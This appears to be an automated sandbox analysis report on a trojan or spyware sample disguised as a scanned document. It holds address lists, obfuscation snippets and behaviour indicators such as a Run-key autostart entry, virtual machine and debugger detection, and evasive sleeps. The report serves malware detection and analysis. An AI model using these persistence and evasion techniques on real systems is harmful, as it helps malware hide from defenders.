4_2_04E31A99 4_2_04E31A99 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D94A5B 4_2_04D94A5B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E20A02 4_2_04E20A02 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D9523D 4_2_04D9523D Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04E3E214 4_2_04E3E214 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D963C2 4_2_04D963C2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D6EBE0 4_2_04D6EBE0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D94B96 4_2_04D94B96 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04D8FB40 4_2_04D8FB40 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B278F0 4_2_00B278F0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B278EB 4_2_00B278EB Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B3AAE2 4_2_00B3AAE2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C8D5D2 14_2_05C8D5D2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C7FDDB 14_2_05C7FDDB Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C71DE3 14_2_05C71DE3 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C8E581 14_2_05C8E581 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C6E58A 14_2_05C6E58A Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BE1530 14_2_05BE1530 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C92519 14_2_05C92519 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C81D1B 14_2_05C81D1B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C6C53F 14_2_05C6C53F Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BC0D40 14_2_05BC0D40 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C8DCC5 14_2_05C8DCC5 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C844EF 14_2_05C844EF Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C92C9A 14_2_05C92C9A Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C91C9F 14_2_05C91C9F Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C83490 14_2_05C83490 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BE1410 14_2_05BE1410 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BD740C 14_2_05BD740C Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF547E 14_2_05BF547E Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C7F42B 14_2_05C7F42B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C91FCE 14_2_05C91FCE Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BE5790 14_2_05BE5790 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C82782 14_2_05C82782 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BC67D0 14_2_05BC67D0 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C91746 14_2_05C91746 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C926F8 14_2_05C926F8 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C83E96 14_2_05C83E96 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C8CE66 14_2_05C8CE66 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF6611 14_2_05BF6611 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF5E70 14_2_05BF5E70 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF4E61 14_2_05BF4E61 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BE7640 14_2_05BE7640 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C861DF 14_2_05C861DF Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C919E2 14_2_05C919E2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF6180 14_2_05BF6180 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C9D9BE 14_2_05C9D9BE Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF7110 14_2_05BF7110 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C19906 14_2_05C19906 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF594B 14_2_05BF594B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C928E8 14_2_05C928E8 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BDA080 14_2_05BDA080 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C718B6 14_2_05C718B6 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF48CB 14_2_05BF48CB Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF0021 14_2_05BF0021 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BFE020 14_2_05BFE020 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF9810 14_2_05BF9810 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF1070 14_2_05BF1070 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C8D016 14_2_05C8D016 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF4B96 14_2_05BF4B96 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BCEBE0 14_2_05BCEBE0 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF63C2 14_2_05BF63C2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BEFB40 14_2_05BEFB40 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BE42B0 14_2_05BE42B0 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C922DD 14_2_05C922DD Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C91A99 14_2_05C91A99 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF523D 14_2_05BF523D Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C80A02 14_2_05C80A02 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C9E214 14_2_05C9E214 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05BF4A5B 14_2_05BF4A5B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_00458B80 15_2_00458B80 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0580E581 15_2_0580E581 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05740D40 15_2_05740D40 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057EC53F 15_2_057EC53F Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05761530 15_2_05761530 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0580D5D2 15_2_0580D5D2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05812519 15_2_05812519 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05801D1B 15_2_05801D1B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057F1DE3 15_2_057F1DE3 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057FFDDB 15_2_057FFDDB Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057EE58A 15_2_057EE58A Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0577547E 15_2_0577547E Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05803490 15_2_05803490 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05812C9A 15_2_05812C9A Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05811C9F 15_2_05811C9F Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0580DCC5 15_2_0580DCC5 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057FF42B 15_2_057FF42B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05761410 15_2_05761410 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_058044EF 15_2_058044EF Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0575740C 15_2_0575740C Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05802782 15_2_05802782 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05811FCE 15_2_05811FCE Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057467D0 15_2_057467D0 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05811746 15_2_05811746 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05765790 15_2_05765790 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05775E70 15_2_05775E70 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05803E96 15_2_05803E96 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05774E61 15_2_05774E61 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05767640 15_2_05767640 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05776611 15_2_05776611 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_058126F8 15_2_058126F8 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0580CE66 15_2_0580CE66 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0577594B 15_2_0577594B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0581D9BE 15_2_0581D9BE Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_058061DF 15_2_058061DF Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_058119E2 15_2_058119E2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05777110 15_2_05777110 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05799906 15_2_05799906 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05776180 15_2_05776180 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05771070 15_2_05771070 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05770021 15_2_05770021 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0577E020 15_2_0577E020 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05779810 15_2_05779810 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_058128E8 15_2_058128E8 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0580D016 15_2_0580D016 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057748CB 15_2_057748CB Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057F18B6 15_2_057F18B6 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0575A080 15_2_0575A080 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0576FB40 15_2_0576FB40 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0574EBE0 15_2_0574EBE0 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057763C2 15_2_057763C2 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05774B96 15_2_05774B96 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05811A99 15_2_05811A99 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05774A5B 15_2_05774A5B Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0577523D 15_2_0577523D Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_058122DD 15_2_058122DD Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_05800A02 15_2_05800A02 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0581E214 15_2_0581E214 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_057642B0 15_2_057642B0 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_00452050 15_2_00452050
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04D6B0E0 appears 176 times Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04DF5110 appears 38 times Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 04DBDDE8 appears 48 times Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: String function: 05F1DDE8 appears 48 times Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: String function: 05ECB0E0 appears 176 times Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: String function: 05F55110 appears 38 times Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 05C1DDE8 appears 49 times Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 0579DDE8 appears 49 times Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 0574B0E0 appears 176 times Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 05C55110 appears 38 times Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 05BCB0E0 appears 176 times Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: String function: 057D5110 appears 40 times
 Sample file is different than original file name gathered from version info Show sources
 Source: Scan_Doc_11052020.exe, 00000000.00000002.844244857.0000000000B1C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe Source: Scan_Doc_11052020.exe, 00000000.00000002.856731482.0000000005450000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamewEYbapqACmfn.exe4 vs Scan_Doc_11052020.exe Source: Scan_Doc_11052020.exe, 00000000.00000002.873153767.0000000005FBF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scan_Doc_11052020.exe Source: Scan_Doc_11052020.exe, 00000000.00000002.855597802.00000000053C0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Scan_Doc_11052020.exe Source: Scan_Doc_11052020.exe Binary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\systray.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Tries to load missing DLLs Show sources
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/10@4/3
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_01
 Creates temporary files Show sources
 PE file has an executable .text section and no other executable section Show sources
 Source: Scan_Doc_11052020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: Scan_Doc_11052020.exe Virustotal: Detection: 19% Source: Scan_Doc_11052020.exe ReversingLabs: Detection: 35%
 Spawns processes Show sources
 Uses an in-process (OLE) Automation server Show sources
 Writes ini files Show sources
 Uses Microsoft Silverlight Show sources
 Checks if Microsoft Office is installed Show sources
 PE file contains a COM descriptor data directory Show sources
 Source: Scan_Doc_11052020.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: Scan_Doc_11052020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
 Binary contains paths to debug symbols Show sources
 Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp Source: Binary string: cmmon32.pdb source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp Source: Binary string: cmmon32.pdbGCTL source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp Source: Binary string: wntdll.pdbUGP source: Scan_Doc_11052020.exe, 00000000.00000002.866787591.0000000005EA0000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.1198574130.0000000004D40000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000E.00000002.1124555745.0000000005CBF000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000F.00000002.1123661907.0000000005720000.00000040.00000001.sdmp, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: vrhdctut50jxtp.exe, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F1DE2D push ecx; ret 0_2_05F1DE40 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05364E9C push 2C00005Eh; iretd 0_2_05364EA1 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_053639A3 push 850FD83Bh; ret 0_2_053639A9 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_0536D292 push 8BD68B50h; iretd 0_2_0536D2A4 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04DBDE2D push ecx; ret 4_2_04DBDE40 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B2D9CD push ds; retf 4_2_00B2D9CE Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39A82 push eax; ret 4_2_00B39A88 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39A8B push eax; ret 4_2_00B39AF2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B252F9 pushfd ; retf 4_2_00B252EA Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B252E9 pushfd ; retf 4_2_00B252EA Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39AEC push eax; ret 4_2_00B39AF2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B39A35 push eax; ret 4_2_00B39A88 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_00B2521A push esi; iretd 4_2_00B25226 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 14_2_05C1DE2D push ecx; ret 14_2_05C1DE40 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Code function: 15_2_0579DE2D push ecx; ret 15_2_0579DE40

Persistence and Installation Behavior:

 Drops PE files Show sources

Boot Survival:

 Creates an autostart registry key Show sources
 Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKL Jump to behavior Source: C:\Windows\SysWOW64\systray.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKL Jump to behavior

Hooking and other Techniques for Hiding and Protection:

 Disables application error messsages (SetErrorMode) Show sources

Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements Show sources
 Contains capabilities to detect virtual machines Show sources
 Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0 Jump to behavior
 Contains functionality for execution timing, often used to detect debuggers Show sources
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe Code function: 0_2_05F95595 rdtsc 0_2_05F95595
 Found large amount of non-executed APIs Show sources
 Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe API coverage: 2.3 % Source: C:\Windows\SysWOW64\systray.exe API coverage: 5.0 % Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe API coverage: 2.2 % Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe API coverage: 2.2 %
 May sleep (evasive loops) to hinder dynamic analysis Show sources
 Sample execution stops while process was sleeping (likely an evasion) Show sources
 Source: C:\Windows\System32\conhost.exe Last function: Thread delayed Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory) Show sources
 Source: vrhdctut50jxtp.exe, 0000000F.00000002.1117943880.00000000027A0000.00000004.00000001.sdmp Binary or memory string: VMware Source: vrhdctut50jxtp.exe Binary or memory string: 01lXXnOEvEHTYeOrs3hGfs4waIYQPAlFaQOCvi6ewWunD2FaSpwFefR1UvSFd0GKq7C6cTAXF8SH0XrfL8k6xDYxx4Q+GjACxSCw3OePvIU77FyXENgPYQqlZnxb1jTMpUD4FAwv3nKCe/3LSahplmkThDkmhhV0ZyDAMCatySM0Q0v6b3UDO7j4UzOaV517j+2bgoohPh9j8rkMayq3185WcNDENX6VQZQnzNpZQvPWuiXqROn/DlSYCVP8Yoay0yFK Source: vrhdctut50jxtp.exe Binary or memory string: xM0LqGj6LjCrw1w4Y9EDPz9F7Zgl2+0A51M/EsSGFCADue5SU1bWhFrvRMo2sv3k8xtOFUbFdSbnV3M6H5AyxTZ57z6XjTXx9/ke9WA1nggpAHVlbYSyYFbxdNBhe01HZkSPRAEOM+aI+BAUikac707YEwIG0/w8nHj+03KYP80NHgFsuPY6up0sx5W1AR0Ab7UE47UTX88St1OzzIJ7E0mTp6024W65nvogC8ngZH4UOZCWodDFq3mKqCkpp2CWLYrf Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
 Queries a list of all running processes Show sources